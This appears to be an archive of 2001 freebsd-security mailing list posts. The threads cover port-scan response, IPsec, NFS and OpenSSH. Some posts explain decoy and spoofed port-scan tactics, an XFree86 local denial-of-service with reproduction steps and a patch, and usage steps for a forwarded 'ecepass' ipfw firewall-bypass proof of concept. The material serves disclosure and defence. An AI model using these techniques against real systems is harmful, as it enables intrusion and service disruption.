From owner-freebsd-security Sun Jan 28 2:21:43 2001 Delivered-To: freebsd-security@freebsd.org Received: from imo-r02.mx.aol.com (imo-r02.mx.aol.com [152.163.225.2]) by hub.freebsd.org (Postfix) with ESMTP id 76CD037B698 for ; Sun, 28 Jan 2001 02:21:25 -0800 (PST) Received: from FBSDSecure@aol.com by imo-r02.mx.aol.com (mail_out_v29.5.) id n.b2.10786063 (4333) for ; Sun, 28 Jan 2001 05:21:19 -0500 (EST) From: FBSDSecure@aol.com Message-ID: Date: Sun, 28 Jan 2001 05:21:19 EST Subject: Re: (no subject) To: freebsd-security@freebsd.org MIME-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Content-Transfer-Encoding: 7bit X-Mailer: AOL 5.0 for Windows sub 120 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In a message dated 1/27/01 9:51:58 PM Pacific Standard Time, kris@obsecurity.org writes: > > To prevent portscanning, there is a package in the ports collection > > called portsentry under both the net and security branches. I an > > currently using it on my firewall computer and when it detects that > > someone is portscanning your computer, you can 'ban' the attacker's > > IP address using ipfw and email you automatically. > > Be very careful using automated responses like automatically > blackholing someone. Port scans can trivially be spoofed (most port > scanners like nmap include a command-line option to do this), and all > an attacker need to do is spoof a scan coming from your ISP's servers > and it will effectively cut you off of the network. > > IMO, there's no problem with portscans if you run a tightly configured > firewall and don't allow in traffic except to services you trust the > world to be able to connect to. > > Kris > > Yes, that is true and yes it can be done. But it's very unlikely that it will be done. Most people use phone modems to connect to the internet. The ISP assignes an IP address to the user's computer based on which port the user came in on. It is pretty much impossible to spoof a ISP assigned IP address, and if they try, the ISP knows about it and usually takes steps to correct it. On DSL connections, the DSLAM KNOWS which IP addresses are valid on a given port, so you must use the IP address(es) that your ISP provides. Cable Modems IP addresses are dynamicly assigned using DHCP. Once again, the IP address is assigned to you. The routers in the ISPs know which IP addresses are valid and which are not. So spoofing an IP address is pretty close to impossible from a Dialup, xDSL, or cable modem. Another thing to point out though is if a hacker were to spoof his IP address and do a port scan, what would be the point? The data is useless if it can't get back to the individual. Besides, the portsentry package has a ignore file. Dan. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jan 28 2:29:56 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.org (adsl-63-207-60-1.dsl.lsan03.pacbell.net [63.207.60.1]) by hub.freebsd.org (Postfix) with ESMTP id 3537837B698 for ; Sun, 28 Jan 2001 02:29:38 -0800 (PST) Received: by obsecurity.org (Postfix, from userid 1000) id D6BE3BA641; Sun, 28 Jan 2001 02:30:05 -0800 (PST) Date: Sun, 28 Jan 2001 02:30:05 -0800 From: Kris Kennaway To: FBSDSecure@aol.com Cc: freebsd-security@FreeBSD.ORG Subject: Re: (no subject) Message-ID: <20010128023005.A19353@xor.obsecurity.org> References: Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="EeQfGwPcQSOJBaQU" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from FBSDSecure@aol.com on Sun, Jan 28, 2001 at 05:21:19AM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --EeQfGwPcQSOJBaQU Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Sun, Jan 28, 2001 at 05:21:19AM -0500, FBSDSecure@aol.com wrote: > addresses are valid and which are not. So spoofing an IP address is pret= ty=20 > close to impossible from a Dialup, xDSL, or cable modem. Another thing t= o=20 Wrong. If this were true, packet-flooding based denial of service attacks would be almost impossible since they would be easily blocked and traced. The sad fact of the matter is that the majority of networks on the internet today, including ISPs do not implement egress filtering. > point out though is if a hacker were to spoof his IP address and do a por= t=20 > scan, what would be the point? The data is useless if it can't get back = to=20 > the individual. Besides, the portsentry package has a ignore file. You miss the point: the attacker won't get any information back out of it, but if you have a fascist response to port scans which blackholes all traffic coming from the IP address of the port scan, the attacker can spoof the packets to come from a server which is critical to the operation of your machine, such as your ISP's DNS servers, or mail servers, which will cause your machine to blackhole them and thereby shoot itself in the foot. At a lower level of annoyance, you can blackhole popular websites like google which the user might use. The point is that automated active response is almost always a bad idea, because it can be fooled into doing more harm than good. Kris --EeQfGwPcQSOJBaQU Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE6c/SsWry0BWjoQKURAgm6AKDUOZ5qKwYBynC+7A4r4WCDMW2JYwCgwM09 bicAtllL48OrrcRCl69NGsY= =Sye6 -----END PGP SIGNATURE----- --EeQfGwPcQSOJBaQU-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jan 28 2:57:17 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.redshells.net (unknown [208.189.113.190]) by hub.freebsd.org (Postfix) with SMTP id 4B7CE37B400 for ; Sun, 28 Jan 2001 02:57:01 -0800 (PST) Received: (qmail 6776 invoked from network); 28 Jan 2001 10:30:22 -0000 Received: from unknown (HELO redshells.net) (208.189.113.150) by mail.redshells.net with SMTP; 28 Jan 2001 10:30:22 -0000 Message-ID: <3A73F27A.41DBC1BC@redshells.net> Date: Sun, 28 Jan 2001 04:20:42 -0600 From: Chris X-Mailer: Mozilla 4.76 [en] (Windows NT 5.0; U) X-Accept-Language: en MIME-Version: 1.0 To: FBSDSecure@aol.com Cc: freebsd-security@freebsd.org Subject: Re: (no subject) References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Another thing to point out though is if a hacker were to spoof his IP address > and do a port scan, what would be the point? The data is useless if it can't > get back to the individual. One word, DoS. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jan 28 8:18: 3 2001 Delivered-To: freebsd-security@freebsd.org Received: from bsdie.rwsystems.net (bsdie.rwsystems.net [209.197.223.2]) by hub.freebsd.org (Postfix) with ESMTP id 2475637B402 for ; Sun, 28 Jan 2001 08:17:47 -0800 (PST) Received: from bsdie.rwsystems.net([209.197.223.2]) (876 bytes) by bsdie.rwsystems.net via sendmail with P:esmtp/R:bind_hosts/T:inet_zone_bind_smtp (sender: ) id for ; Sun, 28 Jan 2001 10:17:22 -0600 (CST) (Smail-3.2.0.111 2000-Feb-17 #1 built 2000-Jun-25) Date: Sun, 28 Jan 2001 10:17:21 -0600 (CST) From: James Wyatt To: Chris Cc: FBSDSecure@aol.com, freebsd-security@freebsd.org Subject: Re: (no subject) In-Reply-To: <3A73F27A.41DBC1BC@redshells.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, 28 Jan 2001, Chris wrote: > > Another thing to point out though is if a hacker were to spoof his IP address > > and do a port scan, what would be the point? The data is useless if it can't > > get back to the individual. > > One word, DoS. Uh, one acronym. Three words - Jy@ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jan 28 9:26: 0 2001 Delivered-To: freebsd-security@freebsd.org Received: from bsdie.rwsystems.net (bsdie.rwsystems.net [209.197.223.2]) by hub.freebsd.org (Postfix) with ESMTP id 4DA2437B400 for ; Sun, 28 Jan 2001 09:25:42 -0800 (PST) Received: from bsdie.rwsystems.net([209.197.223.2]) (3137 bytes) by bsdie.rwsystems.net via sendmail with P:esmtp/R:bind_hosts/T:inet_zone_bind_smtp (sender: ) id for ; Sun, 28 Jan 2001 11:23:56 -0600 (CST) (Smail-3.2.0.111 2000-Feb-17 #1 built 2000-Jun-25) Date: Sun, 28 Jan 2001 11:23:55 -0600 (CST) From: James Wyatt To: FBSDSecure@aol.com Cc: freebsd-security@freebsd.org Subject: Port Scans (was Re: (no subject)) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, 28 Jan 2001 FBSDSecure@aol.com wrote: > At 1/27/01 9:51:58 PM Pacific Standard Time, kris@obsecurity.org writes: [ ... ] > > Be very careful using automated responses like automatically > > blackholing someone. Port scans can trivially be spoofed (most port > > scanners like nmap include a command-line option to do this), and all > > an attacker need to do is spoof a scan coming from your ISP's servers > > and it will effectively cut you off of the network. [ ... ] > Yes, that is true and yes it can be done. But it's very unlikely that it > will be done. Most people use phone modems to connect to the internet. The > ISP assignes an IP address to the user's computer based on which port the > user came in on. It is pretty much impossible to spoof a ISP assigned IP > address, and if they try, the ISP knows about it and usually takes steps to > correct it. On DSL connections, the DSLAM KNOWS which IP addresses are valid > on a given port, so you must use the IP address(es) that your ISP provides. > Cable Modems IP addresses are dynamicly assigned using DHCP. Once again, the > IP address is assigned to you. The routers in the ISPs know which IP > addresses are valid and which are not. So spoofing an IP address is pretty > close to impossible from a Dialup, xDSL, or cable modem. Another thing to > point out though is if a hacker were to spoof his IP address and do a port > scan, what would be the point? The data is useless if it can't get back to > the individual. Besides, the portsentry package has a ignore file. I gotta agree with Kris again on this: in practise if an ISP has *any* filtering, it's *very* rough and only at the INet edge. Limit your fake addresses to the same dialup pool (can be thousands), or large DSL pool. I've worked for several ISPs and only one was technically forward enough to do any real filtering and when they have been bought by a larger ISP that is more interested in their stock and their service so the filtering is going away. Toss your own address in towards the end of the scan on the ports you really want to attack. After the scan, try some simple attacks from a smaller range of addresses. I've seen this pattern in our logs from time to time. If a site has enough traffic, you can hide in the noise if you aren't *too* obvious. One of our sister sites *will* blacklist by class-C block for port scans (usually takes a dialout group out), but he has an exclude list to prevent folks from wreaking too much havoc and, like us, he does more consulting than service provision. - Jy@ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jan 28 10:56: 9 2001 Delivered-To: freebsd-security@freebsd.org Received: from sm5.texas.rr.com (unknown [24.93.35.219]) by hub.freebsd.org (Postfix) with ESMTP id 112E637B400 for ; Sun, 28 Jan 2001 10:55:51 -0800 (PST) Received: from bleep.craftncomp.com (cs2777-167.houston.rr.com [24.27.77.167]) by sm5.texas.rr.com (8.11.0/8.11.1) with ESMTP id f0SJnbe08165 for ; Sun, 28 Jan 2001 13:49:37 -0600 Received: from bloop.craftncomp.com (bloop.craftncomp.com [202.12.111.1]) by bleep.craftncomp.com (8.11.0/8.9.3) with ESMTP id f0SItdG77944 for ; Sun, 28 Jan 2001 12:55:40 -0600 (CST) (envelope-from shocking@houston.rr.com) Received: from bloop.craftncomp.com (localhost [127.0.0.1]) by bloop.craftncomp.com (8.11.1/8.9.3) with ESMTP id f0SIttD79145 for ; Sun, 28 Jan 2001 12:55:55 -0600 (CST) (envelope-from shocking@bloop.craftncomp.com) Message-Id: <200101281855.f0SIttD79145@bloop.craftncomp.com> X-Mailer: exmh version 2.3.1 01/18/2001 with nmh-1.0.4 To: security@freebsd.org Subject: Setting up connections between FreeBSD IPSEC and Linux's FreeS/WAN Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Sun, 28 Jan 2001 12:55:55 -0600 From: Stephen Hocking Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Before I rush and start to do this, has anyone else tried it, and what did you do? Stephen -- The views expressed above are not those of PGS Tensor. "We've heard that a million monkeys at a million keyboards could produce the Complete Works of Shakespeare; now, thanks to the Internet, we know this is not true." Robert Wilensky, University of California To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jan 28 12:43:18 2001 Delivered-To: freebsd-security@freebsd.org Received: from sonar.noops.org (adsl-63-195-97-84.dsl.snfc21.pacbell.net [63.195.97.84]) by hub.freebsd.org (Postfix) with ESMTP id 27AB937B402 for ; Sun, 28 Jan 2001 12:43:00 -0800 (PST) Received: from localhost (root@localhost) by sonar.noops.org (8.9.3/8.9.3) with ESMTP id MAA17618 for ; Sun, 28 Jan 2001 12:43:08 -0800 (PST) (envelope-from root@noops.org) Date: Sun, 28 Jan 2001 12:43:08 -0800 (PST) From: Thomas Cannon To: freebsd-security@FreeBSD.ORG Subject: Re: (no subject) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > On Sun, 28 Jan 2001, Chris wrote: > > > Another thing to point out though is if a hacker were to spoof his IP address > > > and do a port scan, what would be the point? The data is useless if it can't > > > get back to the individual. > > > > One word, DoS. Well, two words... one of which is DoS. Another, which I find fun, and also doesn't matter if your ISP does egress filtering is to make a scan look like it came from your whole subnet. I'm sure that even if my DSL provider was making sure all the leaving traffic came from it's network it would still be tough to catch. Or, and this is rare these days, is if you are on an unswitched subnet or could somehow view traffic in flight you can always make the scan look like it came from the guy next door and just sniff the replies as them come back. I know my DSL is unfiltered on it's way out, so if I'm doing an audit from home for any reason I always mix in 127.0.0.1 as a decoy -- just in case it hits something amusingly misconfigured, like a portsentry-type package with a glaring misconfiguration. -tcannon To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jan 28 13:43: 8 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.org (adsl-63-207-60-1.dsl.lsan03.pacbell.net [63.207.60.1]) by hub.freebsd.org (Postfix) with ESMTP id 3C0F337B698 for ; Sun, 28 Jan 2001 13:42:47 -0800 (PST) Received: by obsecurity.org (Postfix, from userid 1000) id 5541CBA6F8; Sun, 28 Jan 2001 13:43:13 -0800 (PST) Date: Sun, 28 Jan 2001 13:43:12 -0800 From: Kris Kennaway To: Stephen Hocking Cc: security@FreeBSD.ORG Subject: Re: Setting up connections between FreeBSD IPSEC and Linux's FreeS/WAN Message-ID: <20010128134312.C75653@xor.obsecurity.org> References: <200101281855.f0SIttD79145@bloop.craftncomp.com> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="eHhjakXzOLJAF9wJ" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200101281855.f0SIttD79145@bloop.craftncomp.com>; from shocking@houston.rr.com on Sun, Jan 28, 2001 at 12:55:55PM -0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --eHhjakXzOLJAF9wJ Content-Type: text/plain; charset=us-ascii Content-Disposition: inline On Sun, Jan 28, 2001 at 12:55:55PM -0600, Stephen Hocking wrote: > Before I rush and start to do this, has anyone else tried it, and > what did you do? Never tried it, but I know it works. It should all Just Work. Kris --eHhjakXzOLJAF9wJ Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE6dJJwWry0BWjoQKURArA7AJ9zg84nWmKSHCd5BhPUjP6uOsQAdACggxt2 J5Y7kWMcuLSupAGWKrU+yIQ= =yRqc -----END PGP SIGNATURE----- --eHhjakXzOLJAF9wJ-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jan 28 19:52: 2 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.gmx.net (pop.gmx.net [194.221.183.20]) by hub.freebsd.org (Postfix) with SMTP id C16AC37B402 for ; Sun, 28 Jan 2001 19:51:40 -0800 (PST) Received: (qmail 29696 invoked by uid 0); 29 Jan 2001 03:50:44 -0000 Received: from p3ee21533.dip.t-dialin.net (HELO forge.local) (62.226.21.51) by mail.gmx.net (mp011-rz3) with SMTP; 29 Jan 2001 03:50:44 -0000 Received: from thomas by forge.local with local (Exim 3.16 #1 (Debian)) id 14N5LY-0001Vz-00; Mon, 29 Jan 2001 04:51:16 +0100 Date: Mon, 29 Jan 2001 04:51:16 +0100 To: freebsd-security@freebsd.org Cc: XFree86@xfree86.org Subject: Obscure security hole in XFree86 when used with Xwrapper Message-ID: <20010129045116.A5564@crow.dom2ip.de> Mail-Followup-To: tmoestl@gmx.net, freebsd-security@freebsd.org, XFree86@xfree86.org Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i From: Thomas Moestl Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org (for the XFree86 people, PR references etc. are for FreeBSD) Hi, to quote from PR ports/24705 (by Sebastian Reinert): All you need to reproduce this problem is a current version of Xwrapper with x-right, [...] and a self-written script called .xserverrc, that contains following phrase: exec Xwrapper $dspnum &args It is _very important_ that you use an "&" instead of "$" in front of "args"! After all, you configurate your script with the typical rights (e.g. "777"), execute "startx" (you will have x-right for it by default), and the systems shuts down its daemons. By the way: You do not need root-rights... I have looked into this one, and the following code seems to be the flaw (from xc/programs/Xserver/os/connection.c): /* * Magic: If SIGUSR1 was set to SIG_IGN when * the server started, assume that either * * a- The parent process is ignoring SIGUSR1 * * or * * b- The parent process is expecting a SIGUSR1 * when the server is ready to accept connections * * In the first case, the signal will be harmless, * in the second case, the signal will be quite * useful */ #if !defined(WIN32) && !defined(__CYGWIN__) if (OsSignal (SIGUSR1, SIG_IGN) == SIG_IGN) RunFromSmartParent = TRUE; ParentProcess = getppid (); if (RunFromSmartParent) { if (ParentProcess > 0) { kill (ParentProcess, SIGUSR1); } } #endif Now, if the parent process has exited (as happens when Xwrapper or Xfree86 is put to background in the .xserverrc), the SIGUSR1 will go to init (because the process was reparented when the parent exited). This will cause the machine to halt (with FreeBSD init; with other init implementations this may differ). When the Xwrapper is installed, this amounts to a local DoS. The easiest fix would just be: ------------------------------------------------------------------------ *** xc/programs/Xserver/os/connection.c.orig Mon Jan 29 04:16:54 2001 --- xc/programs/Xserver/os/connection.c Mon Jan 29 04:08:32 2001 *************** *** 408,414 **** RunFromSmartParent = TRUE; ParentProcess = getppid (); if (RunFromSmartParent) { ! if (ParentProcess > 0) { kill (ParentProcess, SIGUSR1); } } --- 408,414 ---- RunFromSmartParent = TRUE; ParentProcess = getppid (); if (RunFromSmartParent) { ! if (ParentProcess > 1) { kill (ParentProcess, SIGUSR1); } } ------------------------------------------------------------------------ I think that this should suffice. Any comments? - thomas P.S: please trim CC list when answering. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jan 28 21:37:28 2001 Delivered-To: freebsd-security@freebsd.org Received: from lynx.aba.net.au (lynx.esec.com.au [203.21.84.1]) by hub.freebsd.org (Postfix) with SMTP id 63BF337B400 for ; Sun, 28 Jan 2001 21:37:10 -0800 (PST) Received: (qmail 26075 invoked from network); 29 Jan 2001 05:37:07 -0000 Received: from swun.esec.com.au (HELO esec.com.au) (203.21.85.207) by lynx.esec.com.au with SMTP; 29 Jan 2001 05:37:07 -0000 Message-ID: <3A7502CF.D5172D9D@esec.com.au> Date: Mon, 29 Jan 2001 16:42:39 +1100 From: Sam Wun Organization: eSec Limited X-Mailer: Mozilla 4.76 [en] (X11; U; Linux 2.2.12 i386) X-Accept-Language: en MIME-Version: 1.0 Cc: freebsd-security@freebsd.org Subject: NFS security References: <20010129045116.A5564@crow.dom2ip.de> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, Does anyone knows how to setup NFS trust like the one in Solaris 8 in FreeBSD? Thanks Sam. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jan 28 22:28:58 2001 Delivered-To: freebsd-security@freebsd.org Received: from lynx.aba.net.au (lynx.esec.com.au [203.21.84.1]) by hub.freebsd.org (Postfix) with SMTP id 41D8A37B400 for ; Sun, 28 Jan 2001 22:28:41 -0800 (PST) Received: (qmail 3249 invoked from network); 29 Jan 2001 06:28:38 -0000 Received: from swun.esec.com.au (HELO esec.com.au) (203.21.85.207) by lynx.esec.com.au with SMTP; 29 Jan 2001 06:28:38 -0000 Message-ID: <3A750EE1.2179D68D@esec.com.au> Date: Mon, 29 Jan 2001 17:34:09 +1100 From: Sam Wun Organization: eSec Limited X-Mailer: Mozilla 4.76 [en] (X11; U; Linux 2.2.12 i386) X-Accept-Language: en MIME-Version: 1.0 Cc: freebsd-security@freebsd.org Subject: reporting tools for ipmon. References: <20010129045116.A5564@crow.dom2ip.de> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, Does anyone know where can I download some reporting tools for the ipmon msg which is generated by ipfilter in BSD? Thansk Sam To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jan 28 22:43:43 2001 Delivered-To: freebsd-security@freebsd.org Received: from easynet-gw.netvalue.fr (unknown [212.180.121.161]) by hub.freebsd.org (Postfix) with ESMTP id C73F637B400 for ; Sun, 28 Jan 2001 22:43:25 -0800 (PST) Received: from mail.netvalue.fr (unknown [192.168.1.13]) by easynet-gw.netvalue.fr (Postfix) with ESMTP id F140E8C2C for ; Mon, 29 Jan 2001 07:45:30 +0100 (CET) Received: from mail-hk.netvalue.fr ([192.168.100.13]) by mail.netvalue.fr (Netscape Messaging Server 3.6) with ESMTP id AAA3523 for ; Mon, 29 Jan 2001 07:43:17 +0100 Received: from erwan.netvalue.fr ([192.168.100.100]) by mail-hk.netvalue.fr (Netscape Messaging Server 4.15) with ESMTP id G7WVZM00.JFG; Mon, 29 Jan 2001 14:42:58 +0800 Received: from netvalue.com (localhost [127.0.0.1]) by erwan.netvalue.fr (Postfix) with ESMTP id 11E4818D7; Mon, 29 Jan 2001 14:43:20 +0800 (HKT) Message-ID: <3A751107.5C25BEB6@netvalue.com> Date: Mon, 29 Jan 2001 14:43:19 +0800 From: Erwan Arzur Organization: NetValue Ltd. X-Mailer: Mozilla 4.76 [en] (X11; U; Linux 2.2.12 i386) X-Accept-Language: en, fr-FR MIME-Version: 1.0 To: Sam Wun Cc: freebsd-security@freebsd.org Subject: Re: reporting tools for ipmon. References: <20010129045116.A5564@crow.dom2ip.de> <3A750EE1.2179D68D@esec.com.au> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Sam Wun wrote: > > Hi, > > Does anyone know where can I download some reporting tools for the ipmon msg > which is generated by ipfilter in BSD? > /usr/src/contrib/ipfilter/perl/plog is very useful. -- Erwan Arzur NetValue ltd. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 29 1:58:12 2001 Delivered-To: freebsd-security@freebsd.org Received: from serenity.mcc.ac.uk (serenity.mcc.ac.uk [130.88.200.93]) by hub.freebsd.org (Postfix) with ESMTP id 97E0737B6A0 for ; Mon, 29 Jan 2001 01:57:54 -0800 (PST) Received: from dogma.freebsd-uk.eu.org ([130.88.200.97] ident=root) by serenity.mcc.ac.uk with esmtp (Exim 2.05 #4) id 14NB4L-000Ggx-00 for freebsd-security@freebsd.org; Mon, 29 Jan 2001 09:57:53 +0000 Received: (from rasputin@localhost) by dogma.freebsd-uk.eu.org (8.11.1/8.11.1) id f0T9vri37265 for freebsd-security@freebsd.org; Mon, 29 Jan 2001 09:57:53 GMT (envelope-from rasputin) Date: Mon, 29 Jan 2001 09:57:53 +0000 From: Rasputin To: freebsd-security@freebsd.org Subject: Re: OpenSSH b0rked (was RE: Problems with IPFW patch) Message-ID: <20010129095752.A37233@dogma.freebsd-uk.eu.org> References: <20010124230626.A49802@citusc17.usc.edu> <20010125103255.A78404@FreeBSD.org> <200101262153.f0QLrLL40016@earth.backplane.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0.1i In-Reply-To: <200101262153.f0QLrLL40016@earth.backplane.com>; from dillon@earth.backplane.com on Fri, Jan 26, 2001 at 01:53:21PM -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org * Matt Dillon [010126 21:55]: > :I would ask, that in -STABLE at least, the fatal error be backed > :out to a warning, at least for a few months (with sshd ignoring the > :directive, and continuing to run), and then only move to a fatal > :error + die. > : > :-aDe > > I second this request. It also happened when pam.conf/ssh changed. > Only the serial console saved me from a car trip to one of my > colocated machines. Two such changes in a row for ssh is too much. > > -Matt In general I'd agree with Matt and aDe, but if a directive affecting security has changed, I'd say it's better to be notified of it as soon as possible. Killing off sshd obviously makes remote admin a real problem, though; is there another way to guarantee we'd notice ? -- Rasputin Jack of All Trades :: Master of Nuns To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 29 8: 7:51 2001 Delivered-To: freebsd-security@freebsd.org Received: from libertad.univalle.edu.co (unknown [200.24.102.11]) by hub.freebsd.org (Postfix) with ESMTP id B53E737B699 for ; Mon, 29 Jan 2001 08:07:24 -0800 (PST) Received: from localhost (buliwyf@localhost) by libertad.univalle.edu.co (8.10.0/8.10.0) with ESMTP id f0TGIiw27226 for ; Mon, 29 Jan 2001 11:18:50 -0500 (COT) Date: Mon, 29 Jan 2001 11:18:44 -0500 (COT) From: Buliwyf McGraw To: freebsd-security@FreeBSD.ORG Subject: ecepass - proof of concept code for FreeBSD ipfw bypass (fwd) Message-ID: MIME-Version: 1.0 Content-Type: MULTIPART/Mixed; BOUNDARY="0-1467619970-980427870=:401" Content-ID: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This message is in MIME format. The first part should be readable text, while the remaining parts are likely unreadable without MIME-aware tools. Send mail to mime@docserver.cac.washington.edu for more info. --0-1467619970-980427870=:401 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII Content-ID: Very interesting... ---------- Forwarded message ---------- Date: Thu, 25 Jan 2001 15:04:30 +0200 From: Roelof Temmingh To: BUGTRAQ@SECURITYFOCUS.COM Subject: ecepass - proof of concept code for FreeBSD ipfw bypass An all ZA production...;) FreeBSD ipfw+ECE proof of concept code -------------------------------------- Code written by: Plathond (jacques4i@yahoo.com) for Sensepost (http://www.sensepost.com, info@sensepost.com) More info on the problem: http://packetstorm.securify.com/advisories/freebsd/FreeBSD-SA-01:08.ipfw Original problem found by: Aragon Gouveia How it works: ------------- Using FreeBSD divert rule, all outgoing traffic (or as specified in ipfw rule) will be diverted to the ecepass process - the ECE flag will be added. Traffic directed to hosts behind ipfw-based firewall will be passed, rendering the firewall useless if it makes use of the "allow all from any to any established" rule. Tried & tested... How to use: ----------- 1. Make sure your kernel is compiled with the following options: options IPDIVERT options IPFIREWALL 2. gcc -o ecepass ecepass.c 3. ./ecepass & 4. ipfw add 5 divert 7000 tcp from any to any 5. All TCP traffic will now have the ECE flag added to it. PS1: obviously you need to make sure that the last ipfw rule allows traffic e.g.: 00001 divert 7000 tcp from any to any 65535 allow ip from any to any PS2: as the exploit uses "ipfw divert" it only works on FreeBSD. Ironic eh? spidermark: sensepostdata ece Regards, Roelof. ------------------------------------------------------ Roelof W Temmingh SensePost IT security roelof@sensepost.com +27 83 448 6996 http://www.sensepost.com --0-1467619970-980427870=:401 Content-Type: APPLICATION/OCTET-STREAM; NAME="ecepass.tgz" Content-Transfer-Encoding: BASE64 Content-ID: Content-Description: Content-Disposition: ATTACHMENT; FILENAME="ecepass.tgz" H4sIAH4jcDoAA+0Za1PbSDJfo1/Ry1ZRFhi/EsMWBDYOmByVBCgbLpe9vXKN pZE1h6zRSSMMu5v77dc9o6cFyX7Jbd0eUwnS9PT09Lt75Ml4dPJh/Oybjn6v t7v7Ep4B9PeGvepTj8FgsAuwN3jxsjfoD4f43u/3BsNn0Pu2bJmRJorFAM9i yQPpPY73tfX/0XEac/5megIi8lbb4+MxRLGUHuA/R4YOjxQ+XW7t/K5hWceI DKtYKMVDmN/DZcCUL0MXWv9kzr9SnrwUr++ZL2XHkUsbPBnDlIcJj2Si9q2W CD35OskBhNMGX6lov9utQW3rIhYLEbIA5ukCyaR4xPx+H0YxW8gQ3sr0lgsG r5iev458pjq/sE7I1ZFl/UWuQChYyfgm2a+LZl0nIlxArhVX3PJYQZwGvA0s CECmaiEJQ8XM84QDLZSAJZBE3BGe4C6I0CJd6j02rARumvOMEC4rCcrnwFG1 LElI2w7H546Gkv69gC3MNgv3MdflbgeustNcEXMnI+OjLhKk7QuUnY7cmbME lzzEWRGv+dkWncTdNsQ8dHmsucfDCrw04QHxIDzSypLd8IRg5AOEt4E4qDCL UL1YLoGF93Q+PTgGzzwQic/dDS1xx2gXl5FCTbdWvwMfkDYkaczhXqYx3PA4 5AGIBH1sGYkAmV8J5RvuJJ1KvMpICRmiofI3yMfZ5cnZX8eTq4dWTs8m44+j 9+8ta9CBhePAjiyUnj07jmW96ECnm8M3LbBedrQuSfEwzO2/1+v1QDnRuvyW NezACPVydXxZeIRWe4hK8Nktr5tVW5P2CoWKsi6n/X2Q81sh0yS4J51AyA3C stCUQtfVVAKWKChcC7RVErC0vPnZvLPo7BsQstzrf1UAjbo7HL4YGoJ4QFPI 